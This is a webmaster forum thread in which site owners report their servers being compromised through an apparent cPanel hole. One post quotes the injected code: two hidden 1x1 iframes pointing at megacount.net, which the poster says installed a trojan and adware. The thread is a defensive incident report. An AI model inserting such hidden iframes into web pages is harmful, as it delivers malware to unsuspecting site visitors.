Any of you have your sites hit with the Megacount exploit

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Machete_
    WINNING!
    • Oct 2002
    • 14579

    #1

    Any of you have your sites hit with the Megacount exploit

    Today when I ran updates on some of the sites, I found 2 iframes added to the bottom of the code. Its as only added to the sites using a PhP-include as a menu.
    If I navigated to the site with my browser I saw nothing since its locked up REAL tough. But I then opened it on a test computer with no security and it installed a trojan + one count of adware
    10
    yes
    0%
    5
    no
    0%
    5
  • bl4h
    Confirmed User
    • Jul 2006
    • 1282

    #2
    you fail as a webmaster

    Comment

    • Trixxxia
      Confirmed User
      • Aug 2004
      • 5600

      #3
      Originally posted by ebus_dk
      Today when I ran updates on some of the sites, I found 2 iframes added to the bottom of the code. Its as only added to the sites using a PhP-include as a menu.
      If I navigated to the site with my browser I saw nothing since its locked up REAL tough. But I then opened it on a test computer with no security and it installed a trojan + one count of adware
      Can you hit me up? I'd like to see what it's doing

      Comment

      • Machete_
        WINNING!
        • Oct 2002
        • 14579

        #4
        Originally posted by bl4h
        you fail as a webmaster
        It was a virtual account, and the whole server got exploited

        Comment

        • Machete_
          WINNING!
          • Oct 2002
          • 14579

          #5
          Originally posted by TopBucksTrixxxia
          Can you hit me up? I'd like to see what it's doing

          it included this

          PHP Code:
          <iframe src='http://megacount.net/adv/new.php?adv=167' width=1 height=1></iframe> 
          <iframe src='http://megacount.net/adv/167/new.php' width=1 height=1></iframe> 
          

          Comment

          • boneprone
            Hall Of Fame
            • Jan 2001
            • 34415

            #6
            Seems I got hacked today..

            Would like if someone could shed some light on this on how they got in..

            icq 66883099

            Industry Hall Of Fame Legend Mike Jones
            Bow to the Power - Still BP4L
            http://gfyawards.com/hall-of-fame
            Learn about it kids.

            Comment

            • Machete_
              WINNING!
              • Oct 2002
              • 14579

              #7
              Originally posted by boneprone
              Seems I got hacked today..

              Would like if someone could shed some light on this on how they got in..

              icq 66883099
              dissipate posted these two pretty usefull links
              http://www.securiteam.com/unixfocus/6R0030UH5W.html
              http://www.securiteam.com/unixfocus/6M00315H5S.html

              Im my case (webair hosted) it was through cpanel

              Comment

              Working...